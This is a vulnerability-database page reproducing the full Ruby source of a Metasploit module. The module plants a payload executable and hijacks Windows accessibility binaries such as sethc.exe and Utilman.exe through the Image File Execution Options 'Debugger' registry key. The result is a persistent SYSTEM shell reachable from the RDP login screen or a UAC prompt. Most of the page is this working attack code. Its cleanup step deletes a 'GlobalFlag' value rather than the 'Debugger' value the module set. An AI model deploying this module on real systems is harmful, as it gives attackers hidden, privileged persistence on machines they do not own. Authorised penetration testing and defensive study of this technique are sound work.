Lucene search
+L

Accessibility Features (Sticky Keys) Persistence via Debugger Registry Key

🗓️ 09 Jan 2026 18:58:43Reported by OJ Reeves, h00dieType 
metasploit
 metasploit
🔗 www.rapid7.com👁 461 Views

Module enables persistence by modifying debugger registry keys to hijack accessibility executables for a SYSTEM shell.

Code
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Local
  Rank = ExcellentRanking

  include Msf::Post::File
  include Msf::Exploit::EXE
  include Msf::Exploit::Local::Persistence
  prepend Msf::Exploit::Remote::AutoCheck
  include Msf::Post::Windows::Registry
  include Msf::Post::Windows::Priv
  include Msf::Exploit::Deprecated
  moved_from 'post/windows/manage/sticky_keys'

  DEBUG_REG_PATH = 'HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options'
  DEBUG_REG_VALUE = 'Debugger'

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Accessibility Features (Sticky Keys) Persistence via Debugger Registry Key',
        'Description' => %q{
          This module makes it possible to apply the 'sticky keys' hack to a session with appropriate
          rights. The hack provides a means to get a SYSTEM shell using UI-level interaction at an RDP
          login screen or via a UAC confirmation dialog. The module modifies the Debug registry setting
          for certain executables.

          The module options allow for this hack to be applied to:

          SETHC   (sethc.exe is invoked when SHIFT is pressed 5 times),
          UTILMAN (Utilman.exe is invoked by pressing WINDOWS+U),
          OSK     (osk.exe is invoked by pressing WINDOWS+U, then launching the on-screen keyboard),
          DISP    (DisplaySwitch.exe is invoked by pressing WINDOWS+P),
          NARRATOR (Narrator.exe is invoked by pressing WINDOWS+CTR+ENTER),
          ATBROKER (AtBroker.exe is invoked by launching accessibility features from the login screen, such as WINDOWS+CTR+ENTER).

          Custom payloads and binaries can be run as part of this exploit, but must be manually uploaded
          to the target prior to running the module.
        },
        'Author' => [
          'OJ Reeves', # original module
          'h00die' # persistence mixin, narrator, atbroker, docs
        ],
        'Platform' => ['win'],
        'Arch' => [ARCH_X64, ARCH_X86, ARCH_AARCH64],
        'SessionTypes' => ['meterpreter', 'shell'],
        'References' => [
          ['URL', 'https://web.archive.org/web/20170201184448/https://social.technet.microsoft.com/Forums/windows/en-US/a3968ec9-5824-4bc2-82a2-a37ea88c273a/sticky-keys-exploit'],
          ['URL', 'https://blog.carnal0wnage.com/2012/04/privilege-escalation-via-sticky-keys.html'],
          ['URL', 'https://support.microsoft.com/en-us/windows/appendix-b-narrator-keyboard-commands-and-touch-gestures-8bdab3f4-b3e9-4554-7f28-8b15bd37410a'],
          ['ATT&CK', Mitre::Attack::Technique::T1183_IMAGE_FILE_EXECUTION_OPTIONS_INJECTION],
          ['ATT&CK', Mitre::Attack::Technique::T1546_008_ACCESSIBILITY_FEATURES],
          ['ATT&CK', Mitre::Attack::Technique::T1546_EVENT_TRIGGERED_EXECUTION],
          ['URL', 'https://blogs.msdn.microsoft.com/mithuns/2010/03/24/image-file-execution-options-ifeo/']
        ],
        'Targets' => [
          [ 'Automatic', {} ]
        ],
        'DefaultTarget' => 0,
        'DisclosureDate' => '1995-04-24', # windows 95 release date which included first sticky keys
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'Reliability' => [REPEATABLE_SESSION, EVENT_DEPENDENT],
          'SideEffects' => [ARTIFACTS_ON_DISK, CONFIG_CHANGES]
        }
      )
    )

    register_options([
      OptString.new('PAYLOAD_NAME', [false, 'Name of payload file to write. Random string as default.']),
      OptEnum.new('BINARY', [true, 'The target binary to add the exploit to.', 'SETHC', ['SETHC', 'UTILMAN', 'OSK', 'DISP', 'NARRATOR', 'ATBROKER']]),
    ])
  end

  #
  # Returns the name of the executable to modify the debugger settings of.
  #
  def get_target_exe_name
    case datastore['BINARY']
    when 'UTILMAN'
      'Utilman.exe'
    when 'OSK'
      'osk.exe'
    when 'DISP'
      'DisplaySwitch.exe'
    when 'NARRATOR'
      'Narrator.exe'
    when 'ATBROKER'
      'AtBroker.exe'
    else
      'sethc.exe'
    end
  end

  #
  # Returns the key combinations required to invoke the exploit once installed.
  #
  def get_target_key_combo
    case datastore['BINARY']
    when 'UTILMAN'
      'WINDOWS+U'
    when 'OSK'
      'WINDOWS+U, then launching the on-screen keyboard'
    when 'DISP'
      'WINDOWS+P'
    when 'NARRATOR'
      'WINDOWS+CTR+ENTER'
    when 'ATBROKER'
      'Launching accessibility features from the login screen (such as WINDOWS+CTR+ENTER)'
    else
      'SHIFT 5 times'
    end
  end

  #
  # Returns the full path to the target's registry key based on the current target
  # settings.
  #
  def get_target_exe_reg_key
    "#{DEBUG_REG_PATH}\\#{get_target_exe_name}"
  end

  def check
    print_warning('Payloads in %TEMP% will only last until reboot, you want to choose elsewhere.') if datastore['WritableDir'].start_with?('%TEMP%') # check the original value
    return CheckCode::Safe("#{writable_dir} doesnt exist") unless exists?(writable_dir)

    return CheckCode::Safe('You have admin rights to run this Module') unless is_admin?

    CheckCode::Appears('Likely exploitable')
  end

  def install_persistence
    payload_name = datastore['PAYLOAD_NAME'] || Rex::Text.rand_text_alpha((rand(6..13)))
    temp_path = writable_dir
    payload_exe = generate_payload_exe
    payload_pathname = temp_path + '\\' + payload_name + '.exe'
    vprint_status("Payload pathname: #{payload_pathname}")
    fail_with(Failure::UnexpectedReply, "Error writing payload to: #{payload_pathname}") unless write_file(payload_pathname, payload_exe)
    target_key = get_target_exe_reg_key
    registry_createkey(target_key)
    registry_setvaldata(target_key, DEBUG_REG_VALUE, payload_pathname, 'REG_SZ')

    print_good("'Sticky keys' successfully added. Launch the exploit at an RDP or UAC prompt by pressing #{get_target_key_combo}.")
    @clean_up_rc << "rm \"#{payload_pathname.gsub('\\', '\\\\\\\\')}\"\n"
    @clean_up_rc << "execute -f cmd.exe -a \"/c reg delete \"#{target_key}\" /v GlobalFlag /f\" -H\n"
  end
end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation